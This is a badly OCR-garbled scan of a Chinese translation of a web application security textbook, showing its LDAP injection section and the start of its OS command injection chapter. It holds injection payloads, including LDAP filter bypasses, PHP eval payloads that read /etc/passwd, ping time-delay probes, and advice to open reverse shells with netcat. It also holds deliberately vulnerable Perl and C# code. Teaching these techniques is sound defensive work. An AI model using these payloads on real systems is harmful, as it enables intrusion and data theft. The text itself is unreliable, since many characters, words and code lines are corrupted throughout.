API， 并 日 通 常 在 应 用 程序 中 进行 了 便 编 码 。 因 此 ， 攻 击 者 无 法 通过 修改 用 户 提 交 的 输入 
来 检索 与 查询 检索 的 属性 不 同 的 属性 。 

口 应 用 程序 很 少 返 回 有 用 的 错误 消息 ， 因 此 ， 通 稍 攻 击 者 只 能 “ 育 目 ”利用 各 种 漏洞 。 










































































9.5.1 利用 LDAP 注 入 


尽管 存在 上 述 限 制 ， 但 在 许多 情况 下 ， 攻 击 者 仍然 可 以 利用 LDAP 注 入 源 洞 从 应 用 程序 中 歼 
取 数 据 , 或 执行 未 授权 操作 。 通 第 ,实施 这 类 攻击 的 方法 与 搜索 过 渡 带 的 结构 、 用 户 输 入 的 进入 
上 态 ， 以 及 后 病 LDAP 服 务 本 号 的 执行 细 市 密切 相关 。 

1. 析 取 查询 

以 允许 用 户 查 看 指定 业务 部 门 的 雁 员 的 应 用 程序 为 例 。 其 搜索 结 来 仅 限于 用 户 获 得 授权 可 以 
查看 的 地 理 区 域 。 例 如 ,如果 一 名 用 户 获得 授权 可 以 查看 伦敦 和 雷 丁 地 区 ,并且 他 搜索 的 是 “ 销 
售 ” 部 门 ， 应 用 程序 将 执行 以 下 析 取 查询 : 


(| (department=London sales) (department=-Reading Sales) ， 
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这 里 , 应 用 程序 构建 了 一 个 析 取 查询 , 并 在 用 户 提交 的 输入 之 前 前 置 了 一 些 表 达 式 来 执行 所 
需 的 访问 控制 。 

在 这 种 情况 下 , 攻击 者 可 以 通过 提交 以 下 搜索 项 对 查询 进行 修改 , 以 返回 所 有 地 区 的 所 有 履 
员 的 资料 ; 

ianparients* 

* 学 符 是 LDAP 中 的 通配符 ， 可 匹配 任何 数据 项 。 如 末 将 这 个 输入 舱 入 LDAP 搜 索 过 滤 带 中 ， 
应 用 程序 将 执行 以 下 查询 : 

(| (department-=London ) (department-*) (department-Reading ) (department=*), 

由 于 这 是 一 个 析 取 查询 并 有 旦 包含 通 配 符 搜索 项 ( department=* )， 因 此 ， 它 会 对 所 有 目录 
项 进行 匹配 。 它 会 返回 所 有 地 区 的 所 有 员工 的 资料 ， 从 而 突破 应 用 程序 的 访问 控制 。 

http://mdsec.net/employees/31/ 

http://mdsec.net/employees/49/ 























2. 合 取 查询 

这 里 我 们 以 另 一 个 类 似 的 应 用 程序 为 例 , 同样 , 该 应 用 程序 允许 用 户 按 姓名 在 授权 查看 的 地 
理 区 域内 搜索 雇员 。 

如 果 用 户 获 得 授权 可 以 在 伦敦 进行 搜索 ,并且 它 搜索 姓名 daf， 则 应 用 程序 将 执行 以 下 查询 : 

(& (givenName=daf) (department=London*), 

这 里 , 用 户 的 输入 被 插入 到 合 取 查询 中 , 该 查询 的 第 二 部 分 仅 通过 匹配 其 中 一 个 伦敦 部 门 的 
数据 项 来 执行 所 需 的 访问 控制 。 

在 这 种 情况 下 ， 根 据 后 端 LDAP 服 务 的 执行 细节 ， 攻 击 者 可 以 成 功 实施 两 种 类 型 的 攻击 。 一 
些 LDAP ( 包括 OpenLDAP ) 允许 批量 使 用 多 个 搜索 过 滤 希 ,并且 选 择 性 地 应 用 这 些 过 滤 需 。( 换 
言 之 ， 应 用 程序 将 返回 与 任意 过 滤 融 匹配 的 目录 项 。) 例如 ， 攻 击 者 可 以 提交 以 下 输入 : 

*)) (& (givenName=daf 

如 果 将 这 个 输入 舱 入 原始 搜索 过 滤 冀 中 ， 将 得 到 以 下 查询 : 

(& (givenName=*)) (& (givenName=daf) (department=London*), 

现在 ， 这 个 查询 中 包含 两 个 搜索 过 滤 希 ， 第 一 个 过 滤 需 包含 一 个 通配符 匹配 条 件 。 因 此 ,应 
用 程序 将 返回 所 有 地 区 的 所 有 雇员 的 资料 ， 从 而 避 开 了 应 用 程序 的 访问 控制 。 


http://mdsec.net/employees/42/ 



































注解 ”这 种 注入 第 二 个 搜索 过 滤器 的 技巧 也 可 针对 未 使 用 任何 逻辑 运算 符 的 简单 匹配 


条 件 ， 只 是 后 端 LDAP 接 受 多 个 搜索 过 滤器 。 





9.5 注入 LDAP 2 


第 二 种 针对 合 取 查 询 的 攻击 利用 许多 LDAP 服 务 在 处 理 NULL 字 节 方 面 存在 的 漏洞 。 由 于 这 些 
服务 通常 以 本 地 代码 编写 ， 因 此 ， 搜 索 过 小 带 中 的 NULL 字 节 将 立即 终止 字符 串 ，NUIL 之 后 的 任 
何 字符 将 被 忽略 。 虽 然 LDAP 本 刁 并 不 文 持 注释 (在 SQL 中 可 以 使 用 -- 注 释 符 添 加 注释 )， 但 是 ， 
攻击 者 可 以 利用 它 在 处 理 NULL 字 方 上 的 这 个 漏洞 ， 从 而 “注释 掉 ” 查 询 的 剩余 部 分 。 

在 前 一 个 示例 中 ， 攻 击 者 可 以 提交 以 下 输入 : 

*) ) $0C 

应 用 程序 服务 器 会 将 s00 序 列 解码 成 原 义 NULL 字 节 , 因此 , 如 果 将 以 上 输入 能 入 到 搜索 过 滤 
侣 中 ， 查 询 将 变 为 : 

Cn 

由 于 这 个 过 滤器 在 NULL 字 节 人 处 被 截 短 ， 在 LDAP 看 来 ， 其 中 只 包含 一 个 通配符 条 件 ， 因 此 ， 
应 用 程序 还 会 返回 伦敦 地 区 以 外 的 部 门 的 所 有 雇员 资料 。 


党 试 访 问 


http://mdsec.net/employees/13/ 
http://mdsec.net/employees/42/ 











9.5.2 ”查找 LDAP 注 入 漏洞 


癌 一 项 LDAP 操 作 提 交 无 效 的 输入 并 不 会 生成 任何 证 细 的 错误 消 上 县 。 通 常 ， 由 搜索 功能 返回 
的 结果 和 发 生 的 错误 ( 如 一 个 HTTP500 状 态 码 ) 部 有 助 于 确定 源 洞 。 但 是 ,渗透 测试 员 可 以 使 用 
以 下 步骤 相对 可 靠 地 确定 LDAP 注 入 漏洞 。 











渗透 测试 步 又 





(1) 决 试 仅 输入 * 字 符 作为 搜索 项 。 在 LDAP 中 ， 这 个 字符 是 一 个 通配符 , 但 在 SQL 中 不 是 。 
如 有 果 返 回 大 量 结 采 ， 这 种 情况 明显 表示 攻击 针对 的 是 一 个 LDAP 查 询 。 

(2) 等 试 输入 大 量 的 闭 括号 : 

ye a) 

这 个 输入 将 结束 任何 括 住 输入 、 以 及 那些 包含 主 查 询 过 滤 冀 的 括号 , 导致 无 法 匹配 的 闭 括 
号 ， 因 而 破坏 碍 询 的 声 法 。 如 末 发 生 错误 ,应 用 程序 焉 多 于 受到 LDAP 注 入 。( 注意 ,这 种 输入 
也 会 破坏 其 他 许多 类 型 的 应 用 程序 逻辑 ， 因 此 ， 如 采 已 经 确定 所 针对 的 是 一 个 LDAP 查 询 ， 它 
只 能 提供 一 个 明显 的 指标 。) 

(3) 符 试 输入 各 种 旨 在 干扰 不 同类 型 的 查询 的 表达 式 ， 并 看 是 否 可 以 通过 这 些 表达 了 式 来 影 
啊 返 回 的 结果 。 所 有 LDAP 均 文 持 cn 属性 ， 如 果 对 所 查询 的 目录 一 无 所 知 ， 使 用 该 属性 会 大 有 
用 处 。 例 如 : 
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9.5.3 防止 LDAP 注 入 


如 采 有 必要 在 一 个 LDAP 奉 询 中 插 人 用 户 提 交 的 输入 ， 也 只 提交 可 实施 严格 输入 确认 的 催 单 
数据 。 应 根据 一 份 可 接受 字符 “日 名 单 ” 检 查 用 户 输 入 ， 其 中 最 好 只 包括 字母 数 子 字符 。 应 阻止 
任何 可 能 破坏 LDAP 查 询 的 字符 ,包括 ( ); ，* | & = 和 空 字 节 。 拒 绝 任何 与 日 名 单 不 匹配 的 
输入 ， 不 要 净化 。 

















9.6 ”小结 


我 们 已 经 分 析 了 一 系列 可 用 于 注入 Web 应 用 程序 数据 存储 的 源 洞 。 攻击 者 可 以 利用 这 些 漏 洞 
读 取 或 修改 敏感 的 应 用 程序 数据 、 执 行 其 他 未 授权 操作 ， 或 破坏 应 用 程序 逻辑 来 达到 用 种 目的 。 

更 为 严重 的 是 ， 上 述 攻 击 只 是 大 量 相关 的 注入 攻击 的 一 小 部 分 。 利 用 这 一 类 型 的 其 他 攻击 ， 
攻击 者 可 以 在 服务 从 的 操作 系统 上 执行 命令 、 检索 任 音 文 件 , 并 破坏 其 他 后 端 组 件 , 在 下 一 革 中 ， 
我 们 将 介绍 这 类 攻击 及 其 他 攻击 , 说 明 攻 击 者 如 何 利 用 Web 应 用 程序 中 的 源 洞 攻破 为 应 用 程序 提 
供 文 持 的 更 广泛 的 基础 以 构 的 关键 组 件 。 














9.7 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh 。 

(1) 如 采 要 通过 实施 UNION 攻 击 利 用 SQL 缺陷 获取 数据 ， 但 是 并 不 知 着 最 初 的 查询 返回 的 列 
数 ， 如 何 才能 查 明 这 个 值 ? 

(2) 已 经 确定 一 个 字符 串 参 数 中 的 SQL 注入 漏洞 ， 已 经 确信 数据 库 为 MS-SQL 或 Oracle， 但 当 
前 无 法 获得 任何 数据 或 错误 消息 确定 到 底 是 哪个 数据 库 。 如 何 才 能 查 明 这 一 点 ? 

(3) 已 经 在 应 用 程序 的 许多 位 置 提交 了 一 个 单 引 号 ， 并 通过 得 到 的 错误 消 恩 确定 几 个 潜在 的 
SQL 注入 漏洞 。 下 列 哪 一 种 方法 能 够 以 最 快 的 速度 确定 专门 设计 的 输入 是 否 会 对 应 用 程序 的 处 理 
过 程 造 成 影响 ? 

(a) 注册 一 个 新 用 户 
(b) 更 新 个 人 资料 
(c) 注销 服务 

(4) 在 登录 功能 中 发 现 一 个 SQL 注入 漏洞 ， 试 图 使 用 输入 ' or 1=1-- 避 开 登 录 ， 但 攻击 没有 
成 功 ， 生 成 的 错误 消息 表明 - -字符 串 被 应 用 程序 的 输入 过 滤 删 除 。 如 何 解 雇 这 个 问题 ? 

(5) 已 经 发 现 一 个 SQL 注入 漏洞 ， 但 由 于 应 用 程序 允许 任何 包含 空白 符 的 输入 ， 无 法 实施 任 
何 有 用 的 攻击 。 如 何 解 除 这 种 限制 ? 

(6) 在 将 其 合并 到 SQL 查 询 之 前 ， 应 用 程序 并 不 配对 用 户 输入 中 出 现 的 所 有 单 引 号 。 假 设 已 
经 在 一 个 数字 字段 中 发 现 一 个 SQL 注 入 漏洞 ， 但 需要 在 一 个 攻击 有 效 载 何 中 使 用 一 个 字符 串 值 。 
不 使 用 单 引 号 ， 如 何在 查询 中 插入 字符 串 ? 

(7) 在 极 少 数 情 况 下 ， 应 用 程序 在 用 户 提交 的 输入 中 使 用 参数 化 查询 ， 以 不 安全 的 方式 建立 









































9.7 问题 .39 


动态 SQL 查 询 。 什 么 时 候 会 出 现 这 种 情况 ? 
(8) 假设 已 经 提升 了 在 应 用 程序 中 的 权限 ， 现 在 完全 拥有 管理 员 访 问 权限 ， 这 时 如 果 在 某 个 
用 户 管理 功能 中 发 现 一 个 SQL 注入 漏洞 ， 如 何 利用 这 个 漏洞 进一步 扩大 攻击 范围 ? 
(9) 在 攻击 一 个 并 未 保存 任何 敏感 数据 、 也 未 实施 任何 验证 或 访问 控制 机 制 的 应 用 程序 的 情 
况 下 ， 如 何 排列 下 列 漏 洞 的 重要 性 ? 
(a) SQL 注入 
(b) XPath 注入 
(c) OS 命令 注入 
(10) 假如 正在 检测 一 个 允许 搜索 个 人 资料 的 应 用 程序 功能 , 并 有 旦 怀疑 该 功能 正 访 问 某 数据 库 
或 Active Directory 后 端 。 如 何 确 定 到 底 是 哪 一 种 情况 ? 























测试 后 病 组 件 











eb 应 用 程序 正 变 得 日 益 复 杂 。 它 们 第 间作 为 一 系列 后 妆 业 务 天 键 货 源 ， 包 括 网 络 资 源 
(如 Web 服 务 、 后 端 Web 服 务 天 、 邮 件 服务 天 ) 和 本 地 资源 ( 如 文件 系统 ) 面 回 因特网 
的 接口 及 操作 系统 接口 。 而 且 , 应 用 程序 服务 从 还 作为 这 些 后 端 组 件 的 日 主 访问 控制 层 。 任何 能 
够 与 后 端 组 件 进 行 任意 交互 的 攻击 都 将 能 够 突破 Web 应 用 程序 实施 的 整个 访问 控制 模型 ， 从 而 以 
未 授权 方式 访问 敏感 数据 和 功能 。 
数据 在 不 同 组件 间 传递 时 ， 它 们 将 由 不 同类 型 的 API 和 接口 解释 。 被 核心 应 用 程序 视 为 “ 安 
全 ”的 数据 , 在 文 持 不 同 编码 、 转 义 字 符 、 字 段 分 隔 符 或 字符 串 终 止 符 的 上 层 组 件 看 来 可 能 极 不 
安全 。 此 外 ， 上层 组 件 可 能 会 有 相对 多 的 功能 是 应 用 程序 在 正常 情况 下 所 不 会 调用 的 。 因 此 , 利 
用 注入 漏洞 的 攻击 者 通 弟 不 仅 能 够 突破 应 用 程序 的 访问 控制 , 其 至 能 够 利用 后 端 组 件 支持 的 其 他 
功能 来 攻破 组 件 基础 架构 的 关键 部 分 。 


10.1 注入 操作 系统 命令 


大 多 数 Web 服 务 需 平台 发 展 迅速 ， 现 在 它们 已 能 够 使 用 内 置 的 API 与 服务 硕 的 操作 系统 进行 
几乎 任何 必需 的 交互 。 如 果 正 确 使 用 ， 这 些 API 可 帮助 开发 者 访问 文件 系统 、 连 接 其 他 进程 、 进 
行 安 全 的 网 络 通信 。 但 是 , 许多 时 候 , 开发 者 选择 使 用 更 高 级 的 技术 百 接 回 服务 硕 发 送 操作 系统 
命令 。 由 于 这 些 技术 功能 强大 、 操 作 简 单 ， 并 有 旦 通常 能 够 立即 解决 特定 的 问题 ,因而 具有 很 强 的 
吸引 力 。 但 是 ， 如 果 应 用 程序 癌 操 作 系 统 命令 传送 用 户 提 交 的 输入 ,那么 就 很 可 能 会 受到 命令 注 
入 攻击 ， 由 此 攻击 者 能 够 提交 专门 设计 的 输入 ， 修 改 开 发 者 想 要 执行 的 命令 。 

常用 于 发 出 操作 系统 命令 的 函数 ， 如 PHP 中 的 exec 和 ASP 中 的 wscript.shell 孙 数 ， 通常 
并 不 限制 命令 的 可 执行 范围 。 即 使 开发 者 准备 使 用 API 执 行 相 对 善意 的 任务 , 如 列 出 目录 的 内 容 ， 
攻击 者 还 是 可 以 对 其 进行 暗中 破坏 ,从 而 写 入 任意 文件 或 启动 其 他 程序 。 通常， 所 有 的 注入 命令 
都 可 在 Web 服 务 需 的 进程 中 安全 运行 ， 它 具有 足够 强大 的 功能 ， 使 得 攻击 者 能 够 完全 控制 整个 服 
务 俯 。 

许多 非 定 制 和 定制 Web 应 用 程序 中 都 存在 这 种 命令 注入 缺陷 。 在 为 企业 服务 需 或 防火 墙 、 打 
印 机 和 路 由 器 之 类 的 设备 提供 管理 界面 的 应 用 程序 中 , 这 类 缺陷 尤其 普 迄 。 通 稍 ， 因 为 操作 系统 
交互 允许 开发 者 使 用 合并 用 户 提交 的 数据 的 直接 命令 , 所 以 这 些 应 用 程序 都 对 交互 过 程 提出 了 特 
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殊 的 要 求 。 


10.1.1 例 1: 通过 Per 注入 


以 下 面 的 Perl CGI 代码 为 例 ， 它 是 一 个 用 于 服务 硕 管 理 的 Web 应 用 程序 代码 的 一 部 分 。 这 项 
功能 允许 管理 员 在 服务 右上 指定 一 个 日 录 ， 并 查看 它 的 磁盘 使 用 情况 : 


#1/usr/bin/perl 








use strict; 
USe CGI aqw(:standard escapeHTML):; 
pbrint header, start html("").; 


print "<pre>”"; 


my Scommang = "du -hh --exclude php* /var/www/html".: 
Scommand= Scommand.param( "dir"); 
scommand= Sscommangd ;} 

print "Scommand\n":} 


print end html; 


如 果 按 设想 的 方式 运行 ， 这 段 脚 本 将 把 用 户 提 交 的 qir 参 数值 附加 在 预先 设 定 的 命令 后 面 ， 
执行 命令 并 显示 结果 ， 如 图 10-1 所 示 。 


re ee Ea x 
7 > 

A 全 https: tiiwahh-appjcagi-binifoo,cgi?dir=/public 
Wa 

全 Untitled Document 















4.0K /var/waw/html/public/webgrab/cookies 
72K /var/wauw/html/public/webgrab 

4.0K /var/waw/html/public/home 

452K /var/waw/ntmi/public/images 

176K /var/wuw/hntmil/public/csstest/189 
12K /var/wuw/htmi/public/csstest/188 
208K /var/wuw/htmil/public/csstest 

7T40K /var/waw/htmil/public 


四 1003% 了 


图 10-1 一 个 列 出 目录 内 容 的 简单 应 用 程序 功能 


然而 ,通过 提交 专门 设计 的 、 包 含 shell 元 子 符 的 输入 ,攻击 者 可 对 这 项 功能 进行 各 种 方式 的 
利用 。 A ene 并 可 破坏 开发 者 想 要 执行 的 命令 。 
例如 ， 管 道 每 “|” 可 用 于 将 一 个 进程 的 输出 重 定向 为 为 一 个 进程 的 输入 ， 从 而 将 儿 个 命令 连接 
在 一 起 。 攻击 者 可 以 利用 这 文 种 行为 注入 为 外 一 个 命令 并 获得 输出 结果 ， 如 图 10-2 所 示 。 








unttedDocument x| | 


root:x:0:0:root:/root:/bin/bash 

bin:x:1:1:bin:/bin:/bin/sh 

daemon:x:2:2:daemon:/sbin:/bin/sh 

adm:x:3:4:adm: /var/adm: /bin/sh 
lp:x:4:7:l1p:/var/spool/lpd:/bin/sh 
sync:x:5:0:sync:/sbin:/bin/sync 
shutdown:x:€:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt 
mail:x:8:12:mail:/var/spool/mail:/bin/sh 
news:Xx:9:13:news:/var/spool/news:/bin/sh 
Uucp:X:10:14:uucp:/var/spool/uucp:/bin/sh 
operator:x:11:0:operator:/var:/bin/sh 
games:x:12:100:games:/usr/games:/bin/sh 
nobodvy:x:65534:65534:Nobody:/:/bin/sh 

rpm:x:13:101:system user for rpm:/var/lib/rpm: /bin/false 
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin 
rpc:X:70:70:system user for portmap:/:/bin/false 
xfs:x:71:71i:system user for xorg-x11:/etc/X1i/fs:/bin/false 
messagebus:xXx:72:72:system user for dbus:/:/sbin/nologin 
apache:x:73:73:system user for apache2:/var/www:/bin/sh 
rpcuser:x:74:74:system user for nfs-utils:/var/lib/nfs:/bin/false 
sshd:x:75:75:system user for openssh:/var/empty:/bin/true 
mysdql:x:76:76:sYystem user for MySQL:/var/lib/mysqal:/bin/bash 
squid:Xx:77:77:system user for squid:/var/spool/squid:/bin/false 
postgres:x:78:78:system user for postgresql:/var/lib/pgsql:/bin/bash 
snort:xXx:79:79:system user for snort:/var/log/snort:/bin/false 
manicsprout:x:500:500::/home/manicsprout:/bin/bash 





四 100% 





图 10-2 一 个 成 功 的 命令 注入 攻击 


在 这 个 攻击 中 , 最 初 的 du 命令 的 输出 已 被 重 定 问 为 cat/etc/passwgd 命 令 的 输入 。 不 过 , 这 
个 命令 不 会 理 上 上 述 输 入 ， 而 是 执行 目 己 的 任务 : 输出 passwd 文 件 的 内 容 。 

这 样 简单 的 攻击 似乎 是 不 可 能 的 ; 但 是 , 实际 上 在 众多 商业 产品 中 都 已 发 现 这 类 命令 注入 漏 
洞 。 例 如 ,已 发 现下 面 URL 中 的 HP Openview 存 在 一 个 易 受 攻击 的 命令 注 和 缺陷: 


https://target:3443/0vCgi/connectedNodes .ovpl?node=a | [your command ] 





10.1.2 例 2: 通过 ASP 注 入 


以 下 面 的 C# 代 码 为 例 ， 它 是 一 个 用 于 管理 Web 服 务 器 的 Web 应 用 程序 代码 的 一 部 分 。 该 功能 
允许 管理 员 查 看 被 请 求 的 目录 的 内 容 : 





string dirName = "C:\\filestore\\'" + Directory.'Text: 
ProcessSstartInfo psInfo = new ProcessStartIinfo("cmd", "/c dir "™ + 
dirName}); 

Process Droc = Process.Start (psInfto}: 


如 采 按 设想 的 方式 运行 ,这 段 脚本 将 把 用 户 提 交 的 Directory 参 数值 插入 到 预先 设 定 的 命令 
中 ， 执 行 命令 并 显示 结果， 如 图 10-3 所 示 。 
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em [w= El 


J A 一 
“7) Ehttps//mdsec.net/admin/5/ PP-@moxl nn eo; 
coo vo 


Subdirectory name: Show contents Make directory 





Volume in drive C is Windows 
Volume Serial Number 1s 9281-B332 


Directory of C:\filestore 


14/06/'2011 10:37 <DIR>. 

14/06/2011 10:37 <DIR> .. 

14/06/2011 10:37 15.164 debug logs 
26/05/2011 10:13 24 file.txt 

14/06/2011 10:33 191.520 keira-strpon jpg 
3 File(s) 206.708 bytes 

2 Dir(s) 1.2835.613.616 bytes free 





图 10-3 ”一 个 列 出 目录 内 容 的 功能 
和 前 面 易 受 攻 击 的 Perl 脚 本 一 样 ， 攻 击 者 可 以 使 用 shell 元 字符 破坏 开发 者 预先 设 定 的 命令 ， 
并 注入 他 自己 的 命令 。& 字 符 用 于 将 儿 个 命令 组 合 在 一 起 。 提交 一 个 包含 gx 字符 的 文件 名 和 另外 一 
个 命令 就 可 以 执行 该 命令 并 显示 其 结果 ， 如 图 10-4 所 示 。 





(| ntps//mdsecnet/admin/5/Defaultaspx p-aacx 攻 SS 
异 Directory Manager x lm 


Subdirectory name: && ipconfig Show contents | | Make directory 











Volume in drive Cis Windows 
Volume Serial Number ls 9281-B332 


Directory of C:\filestore 


14/06/2011 10:37 <DIR>. 

14/06;2011 10:37 <DIR> .. 

14/06/2011 10:37 15.164 debug logs 
26/05/2011 10:13 24 fle txt 

14:06;2011 10:33 191.520 keira-strpon jpg 
3 File(s) 206.708 bytes 


2 Dir(s) 1.283.779.436 bytes free 


Windows IP Configuration 


Ethernet adapter Local Area Connection: 


Connection-specific DNS Suffix . : localdomain 





E22:16.50:129 





图 10-4 一 个 成 功 的 命令 注入 攻击 
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尝试 访问 
http://mdsec.net/adm1in/5/ 


http://mdsec.net/adm1in/9/ 
http://mdsec.net/admin/14/ 


10.1.3 ”通过 动态 执行 注入 


许多 Web 肢 本 语言 支持 动态 执行 在 运行 时 生成 的 代码 。 这 种 特性 允许 开发 者 创建 可 根据 各 种 
数据 和 条 件 动态 修改 其 代码 的 应 用 程序 。 如 果 用 户 输 入 合并 到 可 动态 执行 的 代码 中 ,那么 攻击 者 
就 可 以 提交 专门 设计 的 输入 , 破坏 原 有 的 数据 ,指定 服务 刁 执行 自己 的 命令 ,就 好 像 这 些 命令 是 
由 最 初 的 开发 者 编写 的 一 样 。 这 时 ， 攻 击 者 的 第 一 个 目标 通常 是 注入 运行 操作 系统 命令 的 API。 

PHP 了 气 数 eval 可 用 于 动态 执行 在 运行 时 传送 给 该 孙 数 的 代码 。 下面 以 一 个 搜索 功能 为 例 , 该 
功能 允许 用 户 创 建 保存 的 搜索 , 然后 在 用 户 界面 上 以 链接 的 形式 动态 生成 这 些 搜 索 。 用 户 使 用 下 
面 的 URL 访 问 该 搜索 功能 : 

eee ORL 

服务 需 端 应 用 程序 通过 动态 生成 变量 来 执行 这 项 功能 , 生成 的 变量 包含 在 storedsearch 参 
数 中 指定 的 名 / 值 对 ; 此 处 ， 它 创建 值 为 wahh 的 变量 mysearch。 


sstoredsearch = S GET['storedsearch']: 









































eval("sstoredsearch;"); 

这 时 ， 葡 可 以 提交 专门 设计 的 输入 ， 由 eval 函 效 动 态 执 行 ， 从 而 在 服务 硕 闪 应 用 程序 中 注 
入 任意 PHP 命 令 。 分 号 字符 可 用 于 在 单独 一 个 参数 中 将 几 个 命令 连接 在 一 起 。 例 如 ， 要 检索 文件 
/etc/password 的 内 容 ， 可 以 使 用 file_get_contents 或 system 命 仿 : 








/Search.php?storedsearch=\Ssmysearch%®%3dwahh;$%20echo%®%20file get 
_contents('/etc/passwd') 
/Search.php?storedsearch=\smysearch%3dwahh; 20system!('cat%®%20/etc/ 
Dasswad') 


注解 ”Perl 语 言 也 包含 一 个 可 通过 同样 的 方式 加 以 利用 的 eval 函 数 。 注 意 ， 可 能 需要 





对 分 号 字符 进行 URL 编 码 ( 为 83b )， 因 为 一 些 CGI 脚 本 解析 器 将 它 解释 ; 
在 传统 的 ASP 中 ，Execute() 执 行 类 似 的 任务 。 





10.1.4 ”查找 OS 命令 注入 漏洞 


在 应 用 程序 解析 过 程 中 ( 请 参阅 第 4 草 了 解 有 关内 容 )， 通 过 调用 外 部 进程 或 访问 文件 系统 ， 
应 该 能 确定 任何 Web 应 用 程序 与 基础 操作 系统 交互 的 情形 。 攻击 者 开始 攻击 前 要 探查 所 有 这 些 功 
能 ， 寻 找 命令 注入 漏洞 。 然而， 实际 上 ， 应 用 程序 发 出 的 操作 系统 命令 中 可 能 包含 用 户 提交 的 任 
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何 数 据 项 ， 包 括 每 个 URL、 请 求 主体 参数 及 cookie。 因 此 ， 为 对 应 用 程序 进行 全 面 彻底 的 测试 ， 
必须 检查 每 项 应 用 程序 功能 中 的 所 有 这 些 数 据 项 。 

不 同 的 命令 解释 人 各 处 理 shell 元 字符 的 方式 各 不 相同 。 理论 上 , 任何 类 型 的 应 用 程序 开发 平台 
或 Web 服 务 各 可 能 会 调用 任何 shell 解 释 太 ， 在 它 目 己 或 任何 其 他 主机 的 操作 系统 上 运行 。 因 此 ， 
不 应 根据 对 Web 服 务 人 操作 系统 的 了 解 ， 对 应 用 程序 如 何 处 理 元 字符 做 出 任何 假设 。 

有 两 种 类 型 的 元 字符 可 用 于 在 一 个 现 有 的 预先 设 定 的 命令 中 注入 一 个 独立 的 命令 。 

D 字符 ; |& 和 换行 符 可 用 于 将 几 个 命令 逐个 连接 在 一 起 。 有 些 时 候 , 可 以 成 对 使 用 这 些 字 符 

以 达到 不 同 的 将来。 例如 , 在 Windows 命 令 解释 页 中 , 使 用 xg 则 第 二 个 命令 只 有 在 第 一 个 
命令 成 功 执行 后 才 会 运行 。 使 用 | | 则 总 运行 第 二 个 命令 , 无 论 第 一 个 命令 是 否 成 功 执行 。 

口 和 本 章 开 头 的 示例 一 样 ， 反 引 写 (` ) 用 于 将 一 个 独立 的 命令 包含 在 最 初 的 命令 处 理 的 数 

据 中 。 把 一 个 注入 的 命令 放 在 反 引 号 内 shell 解 释 融 就 会 执行 该 命令 , 并 用 这 个 命令 的 结 采 
代 管 被 包含 的 文本 ， 然 后 继续 执行 得 到 的 命令 字符 串 。 

在 前 面 的 示例 中 ,可 以 直接 确定 是 否 可 以 注入 命令 , 并 获得 注入 命令 的 执行 结 末 ， 因 为 应 用 
程序 会 在 啊 应 中 立即 返回 那些 结果 。 然 而 ,在 许多 情况 下 ,这 样 做 是 不 可 能 的 。 可 以 注入 一 个 命 
令 , 但 它 不 会 返回 结 采 ,也 不 会 以 任何 可 确定 的 方式 影响 应 用 程序 随后 的 处 理 过 程 。 或 者 由 于 几 
个 命令 连接 在 一 起 ， 注 入 命令 的 执行 结果 在 执行 过 程 中 丢失 了 。 

通常 , 检测 命令 注入 是 否 可 行 的 最 可 徘 方 法 是 使 用 时 间 延 迟 推 岂 , 类 似 于 前 面 描述 的 利用 惠 
日 SQL 注 入 时 使 用 的 方法 。 如 果 一 个 潜在 的 源 洞 可 能 存在 ,那么 就 可 以 使 用 其 他 方法 确定 这 个 源 
洞 ， 并 获得 注入 命令 的 执行 结 















































渗透 测试 步 又 





() 通 名 可 以 使 用 ping 命 令 让 服务 需 在 一 段 时 期 内 检测 它 的 回环 接口 ( loopback interface )， 
从 而 触发 时 间 延 迟 。Windows 和 UNIX 平 台 在 处 理 命令 分 隔 符 与 bing 命 令 方面 存在 一 些 细微 的 
差别 , 但 是 ,如 条 没有 设置 过 滤 ， 下 面 的 通用 测试 字符 串 应 该 能 够 在 两 个 平台 上 引起 30 秒 的 时 
则 延迟 。 

|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & 

如 果 应 用 程序 过 滤 掉 某 些 命令 分 隅 符 , 为 加 大 检测 到 命令 注入 漏洞 的 可 能 性 , 还 应 该 轮流 

问 每 一 个 目标 参数 提交 下 面 的 每 个 测试 字符 串 ， 并 监控 应 用 程序 进行 响应 的 时 间 。 




















| re 0 | 
er 
& ping -1 30 127.0.0.1 & 
& ping -nn 30 127.0.0.1 & 


> Sl 127.0.0,.1 s 
0a dling =1i 30 127.0.0.1 %0a 
me > 00 


(2) 如 果 发 生 时 间 延 人 运 ， 说 明 应 用 程序 可 能 易于 受到 命令 注入 攻击 。 重 复 儿 次 测试 过 程 ， 
确定 延迟 不 是 由 于 网 络 延 时 或 其 他 异常 造成 的 。 可 以 尝试 更 改 -n 或 -i 参数 的 值 ， 并 确定 经 历 
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的 时 间 延 迟 是 否 会 随 看 提交 的 值 发 生 对 应 的 变化 。 
(3) 使 用 所 发 现 的 任何 一 个 可 成 功 实施 攻击 的 注 和 人 字符 串 ， 党 试 注入 男 一 个 更 有 用 的 命令 
( 如 1s 或 air )， 确 定 是 否 能 够 将 命令 结果 返回 到 浏览 需 上 。 
(4) 如 果 不 能 直接 获得 命令 执行 结果 ， 还 可 以 采用 其 他 方法 。 
口 可 以 尝试 打开 一 条 通 癌 自己 计算 机 的 带 外 通道 。 尝 试 使 用 TFTP 上 传 工 具 至 服务 姨 ， 
使 用 telnet 或 netcat 建 立 一 个 通 回 上 自己 计算 机 的 反 回 shell, 并 使 用 mail1 命 令 通过 SMTP 
发 送 命 令 结 
口 可 以 将 命令 结果 重 定 癌 到 Web 根 目录 下 的 一 个 文件 ， 然 后 使 用 浏览 硕 直 接 获 取 结 
果 。 例 如 : 


dir > c:\inetpub\wwwroot\foo.txt 
(5) 一 旦 找到 注入 命令 的 方法 并 能 够 获得 命令 执行 结 采 ， 就 应 当 确 定 上 自己 的 权限 (通过 使 
用 whoami 或 类 似 命令 ， 或 者 尝试 癌 一 个 受 保护 的 目录 写 入 一 个 无 害 的 文件 )。 然 后 就 可 以 设 
法 提升 目 己 的 权限 ， 进 而 秘密 访问 应 用 程序 中 的 敏感 数据 ， 或 者 通过 被 攻破 的 服务 硕 攻 击 其 


























有 时 ， 由 于 某 些 字符 被 过 滤 掉 ， 或 者 应 用 程序 所 使 用 的 命令 API 的 特殊 行为 ， 可 能 无 法 注入 
一 个 完全 独立 的 命令 。 但 是 ， 攻 击 者 仍然 可 以 破坏 所 执行 的 命令 的 行为 ， 得 到 想 要 的 结果 。 
